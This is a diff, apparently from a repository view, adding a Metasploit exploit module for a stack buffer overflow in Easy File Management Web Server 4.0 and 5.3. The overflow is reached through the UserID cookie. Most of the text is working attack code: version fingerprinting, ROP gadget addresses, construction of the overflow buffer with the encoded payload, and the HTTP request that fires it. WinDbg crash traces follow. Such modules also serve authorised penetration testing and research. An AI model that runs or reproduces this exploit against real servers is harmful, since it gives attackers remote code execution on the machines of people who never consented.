|
| 1 | +## |
| 2 | +# This module requires Metasploit: http//metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | + |
| 8 | +class Metasploit3 < Msf::Exploit::Remote |
| 9 | + Rank = NormalRanking # Reliable memory corruption |
| 10 | + |
| 11 | + include Msf::Exploit::Remote::HttpClient |
| 12 | + |
| 13 | + def initialize(info = {}) |
| 14 | + super(update_info(info, |
| 15 | + 'Name' => 'Easy File Management Web Server Stack Buffer Overflow', |
| 16 | + 'Description' => %q{ |
| 17 | + Easy File Management Web Server v4.0 and v5.3 contains a stack buffer |
| 18 | + overflow condition that is triggered as user-supplied input is not |
| 19 | + properly validated when handling the UserID cookie. This may allow a |
| 20 | + remote attacker to execute arbitrary code. |
| 21 | + }, |
| 22 | + 'Author' => |
| 23 | + [ |
| 24 | + 'superkojiman', # Vulnerability discovery |
| 25 | + 'Julien Ahrens', # Exploit |
| 26 | + 'TecR0c <roccogiovannicalvi[at]gmail.com>' # Metasploit module |
| 27 | + ], |
| 28 | + 'License' => MSF_LICENSE, |
| 29 | + 'References' => |
| 30 | + [ |
| 31 | + ['OSVDB', '107241'], |
| 32 | + ['EDB', '33610'], |
| 33 | + ['BID', '67542'], |
| 34 | + ['URL', 'http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536'], |
| 35 | + ['URL', 'http://www.web-file-management.com/'] |
| 36 | + ], |
| 37 | + 'Platform' => 'win', |
| 38 | + 'Arch' => ARCH_X86, |
| 39 | + 'DefaultOptions' => |
| 40 | + { |
| 41 | + 'EXITFUNC' => 'process' |
| 42 | + }, |
| 43 | + 'Payload' => |
| 44 | + { |
| 45 | + 'BadChars' => "\x00\x0a\x0d;", |
| 46 | + 'Space' => 3420 # Lets play it safe |
| 47 | + }, |
| 48 | + 'Targets' => |
| 49 | + [ |
| 50 | + # Successfully tested efmws.exe (4.0.0.0) / (5.3.0.0) on: |
| 51 | + # -- Microsoft Windows XP [Version 5.1.2600] |
| 52 | + # -- Microsoft Windows [Version 6.1.7600] |
| 53 | + # -- Microsoft Windows [Version 6.3.9600] |
| 54 | + ['Automatic Targeting', { 'auto' => true }], |
| 55 | + ['Efmws 5.3 Universal', { 'Esp' => 0xA445ABCF, 'Ret' => 0x10010101 }], |
| 56 | + ['Efmws 4.0 Universal', { 'Esp' => 0xA4518472, 'Ret' => 0x10010101 }], |
| 57 | + # 0x10010101 = pop ebx > pop ecx > retn |
| 58 | + # 0xA445ABCF = 0x514CF5 push esp > retn 0c |
| 59 | + # 0xA4518472 = 0x457452 jmp esp |
| 60 | + # From ImageLoad.dll |
| 61 | + ], |
| 62 | + 'DisclosureDate' => 'May 20 2014', |
| 63 | + 'DefaultTarget' => 0)) |
| 64 | + |
| 65 | + register_options( |
| 66 | + [ |
| 67 | + OptString.new('TARGETURI', [true, 'The URI path of an existing resource', '/vfolder.ghp']) |
| 68 | + ], self.class) |
| 69 | + end |
| 70 | + |
| 71 | + def get_version |
| 72 | + |
| 73 | + # |
| 74 | + # NOTE: Version 5.3 still reports "4.0" in the "Server" header |
| 75 | + # |
| 76 | + |
| 77 | + version = nil |
| 78 | + res = send_request_raw({'uri' => '/whatsnew.txt'}) |
| 79 | + if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ |
| 80 | + version = $1 |
| 81 | + vprint_status "#{peer} - Found version: #{version}" |
| 82 | + elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ |
| 83 | + version = $1 |
| 84 | + vprint_status "#{peer} - Based on Server header: #{version}" |
| 85 | + end |
| 86 | + |
| 87 | + version |
| 88 | + end |
| 89 | + |
| 90 | + def check |
| 91 | + code = Exploit::CheckCode::Safe |
| 92 | + version = get_version |
| 93 | + if version.nil? |
| 94 | + code = Exploit::CheckCode::Unknown |
| 95 | + elsif version == "5.3" |
| 96 | + code = Exploit::CheckCode::Appears |
| 97 | + elsif version == "4.0" |
| 98 | + code = Exploit::CheckCode::Appears |
| 99 | + end |
| 100 | + |
| 101 | + code |
| 102 | + end |
| 103 | + |
| 104 | + def exploit |
| 105 | + |
| 106 | + # |
| 107 | + # Get target version to determine how to reach call/jmp esp |
| 108 | + # |
| 109 | + |
| 110 | + print_status("#{peer} - Fingerprinting version...") |
| 111 | + version = get_version |
| 112 | + |
| 113 | + if target.name =~ /Automatic/ |
| 114 | + if version.nil? |
| 115 | + fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target") |
| 116 | + elsif version =~ /5\.3/ |
| 117 | + my_target = targets[1] |
| 118 | + elsif version =~ /4\.0/ |
| 119 | + my_target = targets[2] |
| 120 | + end |
| 121 | + print_good("#{peer} - Version #{version} found") |
| 122 | + else |
| 123 | + my_target = target |
| 124 | + unless version && my_target.name.include?(version) |
| 125 | + print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") |
| 126 | + end |
| 127 | + end |
| 128 | + |
| 129 | + # |
| 130 | + # Fu to reach where payload lives |
| 131 | + # |
| 132 | + |
| 133 | + sploit = rand_text(80) # Junk |
| 134 | + sploit << [0x1001D8C8].pack("V") # Push edx |
| 135 | + sploit << rand_text(280) # Junk |
| 136 | + sploit << [my_target.ret].pack("V") # Pop ebx > pop ecx > retn |
| 137 | + sploit << [my_target['Esp']].pack("V") # Setup call/jmp esp |
| 138 | + sploit << [0x10010125].pack("V") # Contains 00000000 to pass the jnz instruction |
| 139 | + sploit << [0x10022AAC].pack("V") # Mov eax,ebx > pop esi > pop ebx > retn |
| 140 | + sploit << rand_text(8) # Filler |
| 141 | + sploit << [0x1001A187].pack("V") # Add eax,5bffc883 > retn |
| 142 | + sploit << [0x1002466D].pack("V") # Push eax > retn |
| 143 | + sploit << payload.encoded |
| 144 | + |
| 145 | + print_status "#{peer} - Trying target #{my_target.name}..." |
| 146 | + |
| 147 | + # |
| 148 | + # NOTE: Successful HTTP request is required to trigger |
| 149 | + # |
| 150 | + |
| 151 | + send_request_cgi({ |
| 152 | + 'uri' => normalize_uri(target_uri.path), |
| 153 | + 'cookie' => "SESSIONID=; UserID=#{sploit}; PassWD=;", |
| 154 | + }, 1) |
| 155 | + end |
| 156 | +end |
| 157 | + |
| 158 | +=begin |
| 159 | +
|
| 160 | +# |
| 161 | +# 0x44f57d This will write UserID up the stack. If the UserID is to large it |
| 162 | +# will overwrite a pointer which is used later on at 0x468702 |
| 163 | +# |
| 164 | +
|
| 165 | +eax=000007d1 ebx=00000000 ecx=000001f4 edx=016198ac esi=01668084 edi=016198ac |
| 166 | +eip=0044f57d esp=016197e8 ebp=ffffffff iopl=0 nv up ei pl nz na po nc |
| 167 | +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 |
| 168 | +fmws+0x4f57d: |
| 169 | +0044f57d f3a5 rep movs dword ptr es:[edi],dword ptr [esi] |
| 170 | +0:004> dd @esi |
| 171 | +01668084 41414141 41414141 41414141 41414141 |
| 172 | +01668094 41414141 41414141 41414141 41414141 |
| 173 | +016680a4 41414141 41414141 41414141 41414141 |
| 174 | +016680b4 41414141 41414141 41414141 41414141 |
| 175 | +016680c4 41414141 41414141 41414141 41414141 |
| 176 | +016680d4 41414141 41414141 41414141 41414141 |
| 177 | +016680e4 41414141 41414141 41414141 41414141 |
| 178 | +016680f4 41414141 41414141 41414141 41414141 |
| 179 | +
|
| 180 | +(c38.8cc): Access violation - code c0000005 (first chance) |
| 181 | +First chance exceptions are reported before any exception handling. |
| 182 | +This exception may be expected and handled. |
| 183 | +eax=00000000 ebx=00000000 ecx=015198fc edx=41414141 esi=015198ec edi=015198fc |
| 184 | +eip=00468702 esp=015197c0 ebp=ffffffff iopl=0 nv up ei pl nz na pe nc |
| 185 | +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 |
| 186 | +fmws+0x68702: |
| 187 | +00468702 ff5228 call dword ptr [edx+28h] ds:0023:41414169=???????? |
| 188 | +
|
| 189 | +=end |
0 commit comments